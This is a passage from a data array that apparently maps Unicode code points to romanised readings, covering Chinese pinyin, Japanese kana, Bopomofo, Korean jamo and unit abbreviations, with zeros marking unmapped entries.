0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"you","chang","ya","yin","ya","ren","jiong",0,"dao","dao","bo","jie","xiao","xiao","wu","wang","wang","wu","si","yao","ji","ji","xin","xin","shou","sui",0,"ri","ri","yue","dai","mu","min","shui","shui","biao","zhao","zhao","qiang","niu","quan",0,0,"mu","shi","shi","shi","si","si","gang","wang",0,"wang",0,"ren","ren",0,0,"yu","yu","rou","ju","cao","cao","cao","hu","yi","xi","xi","jian",0,0,"yan","bei",0,"che","chuo","chuo","chuo","fu","jin","chang","chang","zhang","men",0,"fu","yu","qing","wei","ye","feng","fei",
"shi",0,"shi","shi",0,"ma","gu","gui","yu","niao","lu","mai","huang","mian","qi","qi","chi","chi","long","long","gui","gui","gui",0,0,0,0,0,0,0,0,0,0,0,0,"yi","gun","zhu","pie","yi","jue","er","tou","ren","er","ru","ba","jiong","mi","bing","ji","qian","dao","li","bao","bi","fang","xi","shi","bo","jie","chang","si","you","kou","wei","tu","shi","zhi","sui","xi","da","nu","zi","mian","cun","xiao","you","shi","che","shan","chuan","gong","ji","jin","gan","yao","guang","yin","gong","yi","gong","ji","shan","chi","xin","ge","hu","shou","zhi","pu","wen","dou","jin","fang","wu","ri","yue","yue","mu","qian","zhi","dai","shu","wu","bi","mao","shi","qi","shui","huo","zhao","fu","yao","pan","pian","ya","niu","quan",
"xuan","yu","gua","wa","gan","sheng","yong","tian","pi","ne","bo","bai","pi","min","mu","mao","shi","shi","shi","rou","he","xue","li","zhu","mi","mi","fou","wang","yang","yu","lao","er","lei","er","yu","rou","chen","zi","zhi","jiu","she","chuan","zhou","gen","se","cao","hu","chong","xue","xing","yi","ya","jian","jiao","yan","gu","dou","shi","zhi","bei","chi","zou","zu","shen","che","xin","chen","chuo","yi","you","bian","li","jin","zhang","men","fu","li","zhui","yu","qing","fei","mian","ge","wei","jiu","yin","ye","feng","fei","shi","shou","xiang","ma","gu","gao","biao","dou","chang","ge","gui","yu","niao","lu","lu","mai","ma","huang","shu","hei","zhi","mian","ding","gu","shu","bi","qi","chi","long","gui","yue",0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"ling",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"shi","nian","sa",0,0,0,0,0,0,0,"a",0,"i",0,"u",0,"e",0,"o","ka","ga","ki","gi","ku","gu","ke","ge","ko","go","sa","za","shi","ji","su","zu","se","ze","so","zo","ta",
"da","chi","dji",0,"tsu","dzu","te","de","to","do","na","ni","nu","ne","no","ha","ba","pa","hi","bi","pi","fu","bu","pu","he","be","pe","ho","bo","po","ma","mi","mu","me","mo",0,"ya",0,"yu",0,"yo","ra","ri","ru","re","ro",0,"wa","wi","we","wo","n","vu",0,0,0,0,0,0,0,0,"","",0,0,0,"a",0,"i",0,"u",0,"e",0,"o","ka","ga","ki","gi","ku","gu","ke","ge","ko","go","sa","za","shi","ji","su","zu","se","ze","so","zo","ta","da","chi","dji",0,"tsu","dzu","te","de","to","do","na","ni","nu","ne","no","ha","ba","pa","hi","bi","pi","fu","bu","pu","he","be","pe","ho","bo","po","ma","mi","mu",
"me","mo",0,"ya",0,"yu",0,"yo","ra","ri","ru","re","ro",0,"wa","wi","we","wo","n","vu",0,0,"va","vi","ve","vo",0,0,"","",0,0,0,0,0,0,"b","p","m1","f","d","t","n1","l","g","k","h","j","q","x","zhi1","chi1","shi1","ri1","zi1","ci1","si1","a1","o1","e1","eh1","ai1","ei1","ao1","ou1","an1","en1","ang1","eng1","er1","yi1","wu1","yu1",0,0,0,0,0,0,0,"g","kk","gs","n","nj","nh","d","tt","l","lg","lm","lb","ls","lt","lp",0,"m","b","pp",0,"s","ss","","j","jj","ch","k","t","p","h","a","ae","ya","yae","eo","e","yeo","ye","o","wa","wae","oe","yo","u","wo","we","wi","yu","eu",
"ui","i",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"g","n","d","l",
"m","b","s","","j","ch","k","t","p","h","ga","na","da","la","ma","ba","sa","a","ja","cha","ka","ta","pa","ha",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,"hPa","da","AU","bar","oV","pc","dm",0,0,"IU",0,0,0,0,0,"pA","nA",0,"mA","kA","KB","MB","GB","cal","kcal","pF","nF",0,0,"mg","kg","Hz","kHz","MHz","GHz","THz",0,0,0,0,"fm","nm",0,"mm","cm","km",0,0,0,0,0,0,0,0,0,0,"Pa","kPa","MPa","GPa","rad",0,0,"ps","ns",0,"ms","pV","nV",0,"mV","kV","MV","pW","nW",0,"mW","kW","MW",0,0,0,"Bq","cc","cd",0,0,"dB","Gy","ha","HP","in","KK","KM","kt","lm","ln","log","lx","mb","mil","mol","pH",0,"PPM","PR","sr","Sv","Wb",0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"qiu","tian",0,0,"kua","wu","yin",0,0,0,0,0,"yi",0,0,0,0,0,0,0,0,0,"xie",0,0,0,0,0,"chou",0,0,0,0,"nuo",0,0,"dan",0,0,0,"xu","xing",0,"xiong","liu","lin","xiang","yong","xin","zhen","dai","wu","pan",0,0,"ma","qian","yi","yin","nei","cheng","feng",0,0,0,"zhuo","fang","ao","wu","zuo",0,"zhou","dong","su","yi","qiong","kuang","lei","nao","zhu","shu",0,0,0,"xu",0,0,"shen","jie","die","nuo","su","yi","long","ying","beng",0,0,0,"lan","miao","yi","li","ji",
"yu","luo","chai",0,0,0,"hun","xu","hui","rao",0,"zhou",0,"han","xi","tai","yao","hui","jun","ma","lue","tang","yao","zhao","zhai","yu","zhuo","er","ran","qi","chi","wu","han","tang","se",0,"qiong","lei","sa",0,0,"kui","pu","ta","shu","yang","ou","tai",0,"mian","yin","diao","yu","mie","jun","niao","xie","you",0,0,"che","feng","lei","li",0,"luo",0,"ji",0,0,0,0,"quan",0,"cai","liang","gu","mao",0,"gua","sui",0,0,"mao","man","quan","shi","li",0,"wang","kou","du","zhen","ting",0,0,"bing","huo","dong","gong","cheng",0,"qin","jiong","lu","xing",0,"nan","xie",0,"bi","jie","su",0,"gong",0,"you","xing","qia","pi","dian","fu","luo","qia","qia","tang","bai","gan","ci",
"xuan","lang",0,0,"she",0,"li","hua","tou","pian","di","ruan","e","qie","yi","zhuo","rui","jian",0,"chi","chong","xi",0,"lue","deng","lin","jue","su","xiao","zan",0,0,"zhu","zhan","jian","zou","chua","xie","li",0,"chi","xi","jian",0,"ji",0,"fei","chu","beng","jie",0,"ba","liang","kuai",0,"xia","bie","jue","lei","xin","bai","yang","lu","bei","e","lu",0,0,"che","nuo","xuan","heng","yu",0,"gui","yi","xuan","gong","lou","ti","le","shi",0,"sun","yao","xian","zou",0,"que","yin","xi","zhi","jia","hu","la","yi","ke","fu","qin","ai",0,"ke","chu","xie","chu","wei",0,0,"huan","su","you",0,"jun","zhao","xu","shi",0,"shua","kui","shuang","he","gai","yan","qiu","shen","hua","xi","fan","pang",
"dan","fang","gong","ao","fu","ne","xue","you","hua",0,"chen","guo","n","hua","li","fa","xiao","pou",0,"si",0,0,"le","lin","yi","hou",0,"xu","qu","er",0,0,"xun",0,0,0,0,"nie","wei","xie","ti","hong","tun","nie","nie","yin","zhen",0,0,0,0,0,"wai","shou","nuo","ye","qi","tou","han","jun","dong","hun","lu","ju","huo","ling",0,"tian","lun",0,0,0,0,0,0,"ge","yan","shi","xue","pen","chun","niu","duo","ze","e","xie","you","e","sheng","wen","ku","hu","ge","xia","man","lue","ji","hou","zhi",0,0,"wai",0,"bai","ai","zhui","qian","gou","dan","bei","bo","chu","li","xiao","xiu",0,0,0,0,0,"hong","ti","cu","kuo","lao","zhi","xie","xi",0,
"qie","zha","xi",0,0,"cong","ji","huo","ta","yan","xu","po","sai",0,0,0,"guo","ye","xiang","xue","he","zuo","yi","ci",0,"leng","xian","tai","rong","yi","zhi","xi","xian","ju","ji","han",0,"pao","li",0,"lan","sai","han","yan","qu",0,"yan","han","kan","chi","nie","huo",0,"bi","xia","weng","xuan","wan","you","qin","xu","nie","bi","hao","jing","ao","ao",0,0,"zhen","tan","ju",0,"zuo","bu","jie","ai","zang","ci","fa",0,0,0,0,"nie","liu","mei","dui","bang","bi","bao",0,"chu","xia","tian","chang",0,0,"duo","wei","fu","duo","yu","ye","kui","wei","kuai",0,"wei","yao","long","xing","bu","chi","xie","nie","lang","yi","zong","man","zhang","xia","gun","xie",0,"ji","liao","yi","ji",
"yin",0,"da","yi","xie","hao","yong","kan","chan","tai","tang","zhi","bao","meng","kui","chan","lei",0,"xi",0,"xi","qiao","nang","yun",0,"long","fu","zong",0,"gu","kai","diao","hua","kui",0,"gao","tao",0,"shan","lai","nie","fu","gao","qie","ban","jia","kong","xi","yu","zhui","shen","chuo","xiao","ji","nu","xiao","yi","yu","yi","yan","shen","ran","hao","sa","jun","you",0,"xin","pei","qiu","chan",0,"bu","dong","si","er",0,"mao","yun","ji",0,"qiao","xiong","pao","chu","peng","nuo","jie","yi","er","duo",0,0,0,"duo",0,0,"qie","lu","qiu","sou","can","dou","xi","feng","yi","suo","qie","po","xin","tong","xin","you","bei","long",0,0,0,0,"yun","li","ta","lan","man","qiang","zhou","yan","xi","lu",
"xi","sao","fan",0,"wei","fa","yi","nao","cheng","tan","ji","shu","pian","an","kua","cha",0,"xian","zhi",0,0,"feng","lian","xun","xu","mi","hui","mu","yong","zhan","yi","nou","tang","xi","yun","shu","fu","yi","da",0,"lian","cao","can","ju","lu","su","nen","ao","an","qian",0,"cui","cong",0,"ran","nian","mai","xin","yue","nai","ao","shen","ma",0,0,"lan","xi","yue","zhi","weng","huai","meng","niao","wan","mi","nie","qu","zan","lian","zhi","zi","hai","xu","hao","xuan","zhi","mian","chun","gou",0,"chun","luan","zhu","shou","liao","jiu","xie","ding","jie","rong","mang",0,"ke","yao","ning","yi","lang","yong","yin","yan","su",0,"lin","ya","mao","ming","zui","yu","yi","gou","mi","jun","wen",0,"kang","dian","long",0,"xing",
"cui","qiao","mian","meng","qin",0,"wan","de","ai",0,"bian","nou","lian","jin","yu","chui","zuo","bo","hui","yao","tui","ji","an","luo","ji","wei","bo","za","xu","nian","yun",0,"ba","zhe","ju","wei","xie","qi","yi","xie","ci","qiu","du","niao","qi","ji","tui",0,"song","dian","lao","zhan",0,0,"yin","cen","ji","hui","zi","lan","nao","ju","qin","dai",0,"jie","xu","cong","yong","dou","chi",0,"min","huang","sui","ke","zu","hao","cheng","xue","ni","chi","lian","an","mu","si","xiang","yang","hua","cuo","qiu","lao","fu","dui","mang","lang","tuo","han","mang","bo","qun","qi","han",0,"long",0,"tiao","ze","qi","zan","mi","pei","zhan","xiang","gang",0,"qi",0,"lu",0,"yun","e","duan","min","wei","quan","sou","min","tu",
0,"ming","yao","jue","li","kuai","gang","yuan","da",0,"lao","lou","qian","ao","biao","yong","mang","dao",0,"ao",0,"xi","fu","dan","jiu","run","tong","qu","e","qi","ji","ji","hua","jiao","zui","biao","meng","bai","wei","yi","ao","yu","hao","dui","wo","ni","cuan",0,"li","lu","niao","huai","li",0,"lu","feng","mi","yu",0,"ju",0,0,"zhan","peng","yi",0,"ji","bi",0,"ren","huang","fan","ge","ku","jie","sha",0,"si","tong","yuan","zi","bi","kua","li","huang","xun","nuo",0,"zhe","wen","xian","qia","ye","mao",0,0,"shu",0,"qiao","zhun","kun","wu","ying","chuang","ti","lian","bi","gou","mang","xie","feng","lou","zao","zheng","chu","man","long",0,"yin","pin","zheng","jian","luan","nie","yi",0,"ji","ji","zhai",
"yu","jiu","huan","zhi","la","ling","zhi","ben","zha","ju","dan","liao","yi","zhao","xian","chi","ci","chi","yan","lang","dou","long","chan",0,"tui","cha","ai","chi",0,"ying","zhe","tou",0,"tui","cha","yao","zong",0,"pan","qiao","lian","qin","lu","yan","kang","su","yi","chan","jiong","jiang",0,"jing",0,"dong",0,"juan","han","di",0,0,"hong",0,"chi","diao","bi",0,"xun","lu",0,"xie","bi",0,"bi",0,"xian","rui","bie","er","juan",0,"zhen","bei","e","yu","qu","zan","mi","yi","si",0,0,0,"shan","tai","mu","jing","bian","rong","ceng","can","ding",0,0,0,0,"di","tong","ta","xing","song","duo","xi","tao",0,"ti","shan","jian","zhi","wei","yin",0,0,"huan","zhong","qi","zong",0,"xie","xie",
"ze","wei",0,0,"ta","zhan","ning",0,0,0,"yi","ren","shu","cha","zhuo",0,"mian","ji","fang","pei","ai","fan","ao","qin","qia","xiao","fen","gan","qiao","ge","tong","chan","you","gao","ben","fu","chu","zhu",0,"zhou",0,"hang","nin","jue","chong","cha","kong","lie","li","yu",0,"yu","hai","li","hou","gong","ke","yuan","de","hui",0,"guang","jiong","zuo","fu","qie","bei","che","ci","mang","han","xi","qiu","huang",0,0,"chou","san","yan","zhi","de","te","men","ling","shou","tui","can","die","che","peng","yi","ju","ji","lai","tian","yuan",0,"cai","qi","yu","lian","cong",0,0,0,"yu","ji","wei","mi","sui","xie","xu","chi","qiu","hui",0,"yu","qie","shun","shui","duo","lou",0,"pang","tai","zhou","yin","sao","fei",
"chen","yuan","yi","hun","se","ye","min","fen","he",0,"yin","ce","ni","ao","feng","lian","chang","chan","ma","die","hu","lu",0,"yi","hua","zha","hu","e","huo","sun","ni","xian","li","xian","yan","long","men","jin","ji",0,"bian","yu","huo","miao","chou","mai",0,"le","jie","wei","yi","xuan","xi","can","lan","yin","xie","za","luo","ling","qian","huo","jian","wo",0,0,"ge","zhu","die","yong","ji","yang","ru","xi","shuang","yu","yi","qian","ji","qu","tian","shou","qian","mu","jin","mao","yin","gai","po","xuan","mao","fang","ya","gang","song","hui","yu","gua","guai","liu","e","zi","zi","bi","wa",0,"lie",0,0,"kuai",0,"hai","yin","zhu","chong","xian","xuan",0,"qiu","pei","gui","er","gong","qiong","hu","lao","li","chen","san",
"zhuo","wo","pou","keng","tun","peng","te","ta","zhuo","biao","gu","hu",0,"bing","zhi","dong","dui","zhou","nei","lin","po","ji","min","wei","che","gou","bang","ru","tan","bu","zong","kui","lao","han","ying","zhi","jie","xing","xie","xun","shan","qian","xie","su","hai","mi","hun","pi",0,"hui","na","song","ben","chou","jie","huang","lan",0,"hu","dou","huo","gun","yao","ce","gui","jian","jian","dao","jin","ma","hui","mian","can","lue","pi","yang","ju","ju","que",0,"qian","shai",0,"jiu","huo","yun","da","xuan","xiao","fei","ce","ye",0,"den",0,"qin","hui","tun",0,"qiang","xi","ni","sai","meng","tuan","lan","hao","ci","zhai","ao","luo","mie",0,"fu",0,"xie","bo","hui","qing","xie",0,0,"bo","qian","po","jiao","jue","kun","song",
"ju","e","nie","qian","die","die",0,"qi","zhi","qi","zhui","ku","yu","qin","ku","he","fu",0,"di","xian","gui","he","qun","han","tong","bo","shan","bi","lu","ye","ni","chuai","san","diao","lu","tou","lian","ke","san","zhen","chuai","lian","mao",0,"qian","kai","shao","xiao","bi","zha","yin","xi","shan","su","sa","rui","chuo","lu","ling","cha",0,"huan",0,0,"jia","ban","hu","dou",0,"lou","ju","juan","ke","suo","luo","zhe","ding","duan","zhu","yan","pang","cha",0,0,0,0,"yi",0,0,"you","hui","yao","yao","zhi","gong","qi","gen",0,0,"hou","mi","fu","hu","guang","tan","di",0,"yan",0,0,"qu",0,"chang","ming","tao","bao","an",0,0,"xian",0,0,0,"mao","lang","nan","bei","chen",0,
"fei","zhou","ji","jie","shu",0,"kun","die","lu",0,0,0,0,"yu","tai","chan","man","min","huan","wen","nuan","huan","hou","jing","bo","xian","li","jin",0,"mang","piao","hao","yang",0,"xian","su","wei","che","xi","jin","ceng","he","fen","shai","ling",0,"dui","qi","pu","yue","bo",0,"hui","die","yan","ju","jiao","nan","lie","yu","ti","tian","wu","hong","xiao","hao",0,"tiao","zheng",0,"huang","fu",0,0,"tun",0,"reng","jiao",0,"xin",0,0,"yuan","jue","hua",0,"bang","mou",0,"gang","wei",0,"mei","si","bian","lu","qu",0,0,"ge","zhe","lu","pai","rong","qiu","lie","gong","xian","xi","xin",0,"niao",0,0,0,"xie","lie","fu","cuo","zhuo","ba","zuo","zhe","zui","he","ji",0,"jian",0,
0,0,"tu","xian","yan","tang","ta","di","jue","ang","han","xiao","ju","wei","bang","zhui","nie","tian","nai",0,0,"you","mian",0,0,"nai","sheng","cha","yan","gen","chong","ruan","jia","qin","mao","e","li","chi","zang","he","jie","nian",0,"guan","hou","gai",0,"ben","suo","wu","ji","xi","qiong","he","weng","xian","jie","hun","pi","shen","chou","zhen",0,"zhan","shuo","ji","song","zhi","ben",0,0,0,"lang","bi","xuan","pei","dai",0,"zhi","pi","chan","bi","su","huo","hen","jiong","chuan","jiang","nen","gu","fang",0,0,"ta","cui","xi","de","xian","kuan","zhe","ta","hu","cui","lu","juan","lu","qian","pao","zhen",0,"li","cao","qi",0,0,"ti","ling","qu","lian","lu","shu","gong","zhe","pao","jin","qing",0,0,"zong",
"pu","jin","biao","jian","gun",0,0,"zao","lie","li","luo","shen","mian","jian","di","bei",0,"lian",0,"xian","pin","que","long","zui",0,"jue","shan","xue",0,"xie",0,"lan","qi","yi","nuo","li","yue",0,"yi","chi","ji","hang","xie","keng","zi","he","xi","qu","hai","xia","hai","gui","chan","xun","xu","shen","kou","xia","sha","yu","ya","pou","zu","you","zi","lian","xian","xia","yi","sha","yan","jiao","xi","chi","shi","kang","yin","hei","yi","xi","se","jin","ye","you","que","ye","luan","kun","zheng",0,0,0,0,"xie",0,"cui","xiu","an","xiu","can","chuan","zha",0,"yi","pi","ku","sheng","lang","tui","xi","ling","qi","wo","lian","du","men","lan","wei","duan","kuai","ai","zai","hui","yi","mo","zi","fen","peng",0,
"bi","li","lu","luo","hai","zhen","gai","que","zhen","kong","cheng","jiu","jue","ji","ling",0,"shao","que","rui","chuo","neng","zhi","lou","pao",0,0,"bao","rong","xian","lei","xiao","fu","qu",0,"sha","zhi","tan","rong","su","ying","mao","nai","bian",0,"shuai","tang","han","sao","rong",0,"deng","pu","jiao","tan",0,"ran","ning","lie","die","die","zhong",0,"lu","dan","xi","gui","ji","ni","yi","nian","yu","wang","guo","ze","yan","cui","xian","jiao","tou","fu","pei",0,"you","qiu","ya","bu","bian","shi","zha","yi","bian",0,"dui","lan","yi","chai","chong","xuan","xu","yu","xiu",0,0,0,"ta","guo",0,0,0,"long","xie","che","jian","tan","pi","zan","xuan","xian","niao",0,0,0,0,0,"mi","ji","nou","hu","hua",
"wang","you","ze","bi","mi","qiang","xie","fan","yi","tan","lei","yong",0,"jin","she","yin","ji",0,"su",0,0,0,"wang","mian","su","yi","shai","xi","ji","luo","you","mao","zha","sui","zhi","bian","li",0,0,0,0,0,0,0,"qiao","guan","xi","zhen","yong","nie","jun","xie","yao","xie","zhi","neng",0,"si","long","chen","mi","que","dan","shan",0,0,0,"su","xie","bo","ding","zu",0,"shu","she","han","tan","gao",0,0,0,"na","mi","xun","men","jian","cui","jue","he","fei","shi","che","shen","nu","ping","man",0,0,0,0,"yi","chou",0,"ku","bao","lei","ke","sha","bi","sui","ge","pi","yi","xian","ni","ying","zhu","chun","feng","xu","piao","wu","liao","cang","zou","zuo","bian","yao","huan",
"pai","xiu",0,"lei","qing","xiao","jiao","guo",0,0,"yan","xue","zhu","heng","ying","xi",0,0,"lian","xian","huan","yin",0,"lian","shan","cang","bei","jian","shu","fan","dian",0,"ba","yu",0,0,"nang","lei","yi","dai",0,"chan","chao","gan","jin","nen",0,0,0,"liao","mo","you",0,"liu","han",0,"yong","jin","chi","ren","nong",0,0,"hong","tian",0,"ai","gua","biao","bo","qiong",0,"shu","chui","hui","chao","fu","hui","e","wei","fen","tan",0,"lun","he","yong","hui",0,"yu","zong","yan","qiu","zhao","jiong","tai",0,0,0,0,0,0,"tui","lin","jiong","zha","xing","hu",0,"xu",0,0,0,"cui","qing","mo",0,"zao","beng","chi",0,0,"yan","ge","mo","bei","juan","die","zhao",0,
"wu","yan",0,"jue","xian","tai","han",0,"dian","ji","jie",0,"zuan",0,"xie","lai","fan","huo","xi","nie","mi","ran","cuan","yin","mi",0,"jue","qu","tong","wan","zhe","li","shao","kong","xian","zhe","zhi","tiao","shu","bei","ye","pian","chan","hu","ken","jiu","an","chun","qian","bei","ba","fen","ke","tuo","tuo","zuo","ling",0,"gui","yan","shi","hou","lie","sha","si",0,"bei","ren","du","bo","liang","qian","fei","ji","zong","hui","he","li","yuan","yue","xiu","chan","di","lei","jin","chong","si","pu","yao","jiang","huan","huan","tao","ru","weng","ying","rao","yin","shi","yin","jue","tun","xuan","jia","zhong","qie","zhu","diao",0,"you",0,0,"yi","shi","yi","mo",0,0,"que","xiao","wu","geng","ying","ting","shi","ni","geng","ta","wo",
"ju","chan","piao","zhuo","hu","nao","yan","gou","yu","hou",0,"si","chi","hu","yang","weng","xian","pin","rong","lou","lao","shan","xiao","ze","hai","fan","han","chan","zhan",0,"ta","zhu","nong","han","yu","zhuo","you","li","huo","xi","xian","chan","lian",0,"si","jiu","pu","qiu","gong","zi","yu",0,0,"reng","niu","mei","ba","jiu",0,"xu","ping","bian","mao",0,0,0,0,"yi","yu",0,"ping","qu","bao","hui",0,0,0,"bu","mang","la","tu","wu","li","ling",0,"ji","jun","zou","duo","jue","dai","bei",0,0,0,0,0,"la","bin","sui","tu","xue",0,0,0,0,0,"duo",0,0,"sui","bi","tu","se","can","tu","mian","jin","lu",0,0,"zhan","bi","ji","zen","xuan","li",0,0,
"sui","yong","shu",0,0,"e",0,0,0,0,"qiong","luo","zhen","tun","gu","yu","lei","bo","nei","pian","lian","tang","lian","wen","dang","li","ting","wa","zhou","gang","xing","ang","fan","peng","bo","tuo","shu","yi","bo","qie","tou","gong","tong","han","cheng","jie","huan","xing","dian","chai","dong","pi","ruan","lie","sheng","ou","di","yu","chuan","rong","kang","tang","cong","piao","chuang","lu","tong","zheng","li","sa","pan","si",0,"dang","hu","yi","xian","xie","luo","liu",0,"tan","gan",0,"tan",0,0,0,"you","nan",0,"gang","jun","chi","gou","wan","li","liu","lie","xia","bei","an","yu","ju","rou","xun","zi","cuo","can","zeng","yong","fu","ruan",0,"xi","shu","jiao","jiao","xu","zhang",0,0,"shui","chen","fan","ji","zhi",0,"gu",
"wu",0,"qie","shu","hai","tuo","du","zi","ran","mu","fu","ling","ji","xiu","xuan","nai","ya","jie","li","da","ru","yuan","lu","shen","li","liang","geng","xin","xie","qin","qie","che","you","bu","kuang","que","ai","qin","qiang","chu","pei","kuo","yi","guai","sheng","pian",0,"zhou","huang","hui","hu","bei",0,0,"zha","ji","gu","xi","gao","chai","ma","zhu","tui","zhui","xian","lang",0,0,0,"zhi","ai","xian","guo","xi",0,"tui","can","sao","xian","jie","fen","qun",0,"yao","dao","jia","lei","yan","lu","tui","ying","pi","luo","li","bie",0,"mao","bai","huang",0,"yao","he","chun","he","ning","chou","li","tang","huan","bi","ba","che","yang","da","ao","xue",0,"zi","da","ran","bang","cuo","wan","ta","bao","gan","yan","xi","zhu",
"ya","fan","you","an","tui","meng","she","jin","gu","ji","qiao","jiao","yan","xi","kan","mian","xuan","shan","wo","qian","huan","ren","zhen","tian","jue","xie","qi","ang","mei","gu",0,"tao","fan","ju","chan","shun","bi","mao","shuo","gu","hong","hua","luo","hang","jia","quan","gai","huang","bu","gu","feng","mu","ai","ying","shun","liang","jie","chi","jie","chou","ping","chen","yan","du","di",0,"liang","xian","biao","xing","meng","ye","mi","qi","qi","wo","xie","yu","qia","cheng","yao","ying","yang","ji","zong","xuan","min","lou","kai","yao","yan","sun","gui","huang","ying","sheng","cha","lian",0,"xuan","chuan","che","ni","qu","miao","huo","yu","zhan","hu","ceng","biao","qian","xi","jiang","kou","mai","mang","zhan","bian","ji","jue","nang","bi","shi","shuo","mo","lie","mie","mo",
"xi","chan","qu","jiao","huo","xian","xu","niu","tong","hou","yu",0,"chong","bo","zuan","diao","zhuo","ji","qia",0,"xing","hui","shi","ku",0,"dui","yao","yu","bang","jie","zhe","jia","shi","di","dong","ci","fu","min","zhen","zhen",0,"yan","qiao","hang","gong","qiao","lue","guai","la","rui","fa","cuo","yan","gong","jie","guai","guo","suo","wo","zheng","nie","diao","lai","ta","cui","ya","gun",0,0,"di",0,"mian","jie","min","ju","yu","zhen","zhao","zha","xing",0,"ban","he","gou","hong","lao","wu","bo","keng","lu","cu","lian","yi","qiao","shu",0,"xuan","jin","qin","hui","su","chuang","dun","long",0,"nao","tan","dan","wei","gan","da","li","ca","xian","pan","la","zhu","niao","huai","ying","xian","lan","mo","ba",0,"gui","bi","fu","huo",
"yi","liu",0,"yin","juan","huo","cheng","dou","e",0,"yan","zhui","zha","qi","yu","quan","huo","nie","huang","ju","she",0,0,"peng","ming","cao","lou","li","chuang",0,"cui","shan","dan","qi",0,"lai","ling","liao","reng","yu","yi","diao","qi","yi","nian","fu","jian","ya","fang","rui","xian",0,0,"bi","shi","po","nian","zhi","tao","tian","tian","ru","yi","lie","an","he","qiong","li","gui","zi","su","yuan","ya","cha","wan","juan","ting","you","hui","jian","rui","mang","ju","zi","ju","an","sui","lai","hun","quan","chang","duo","kong","ne","can","ti","xu","jiu","huang","qi","jie","mao","yan",0,"zhi","tui",0,"ai","pang","cang","tang","en","hun","qi","chu","suo","zhuo","nou","tu","shen","lou","biao","li","man","xin","cen","huang","mei","gao",
"lian","dao","zhan","zi",0,0,"zhi","ba","cui","qiu",0,"long","xian","fei","guo","cheng","jiu","e","chong","yue","hong","yao","ya","yao","tong","zha","you","xue","yao","ke","huan","lang","yue","chen",0,0,"shen",0,"ning","ming","hong","chuang","yun","xuan","jin","zhuo","yu","tan","kang","qiong",0,"cheng","jiu","xue","zheng","chong","pan","qiao",0,"qu","lan","yi","rong","si","qian","si",0,"fa",0,"meng","hua",0,0,"hai","qiao","chu","que","dui","li","ba","jie","xu","luo",0,"yun","zhong","hu","yin",0,"zhi","qian",0,"gan","jian","zhu","zhu","ku","nie","rui","ze","ang","zhi","gong","yi","chi","ji","zhu","lao","ren","rong","zheng","na","ce",0,0,"yi","jue","bie","cheng","jun","dou","wei","yi","zhe","yan",0,"san","lun","ping",
"zhao","han","yu","dai","zhao","fei","sha","ling","ta","qu","mang","ye","bao","gui","gua","nan","ge",0,"shi","ke","suo","ci","zhou","tai","kuai","qin","xu","du","ce","huan","cong","sai","zheng","qian","jin","zong","wei",0,0,"xi","na","pu","sou","ju","zhen","shao","tao","ban","ta","qian","weng","rong","luo","hu","sou","zhong","pu","mie","jin","shao","mi","shu","ling","lei","jiang","leng","zhi","diao",0,"san","gu","fan","mei","sui","jian","tang","xie","ku","wu","fan","luo","can","ceng","ling","yi","cong","yun","meng","yu","zhi","yi","dan","huo","wei","tan","se","xie","sou","song","qian","liu","yi",0,"lei","li","fei","lie","lin","xian","xiao","ou","mi","xian","rang","zhuan","shuang","yan","bian","ling","hong","qi","liao","ban","bi","hu","hu",0,"ce","pei",
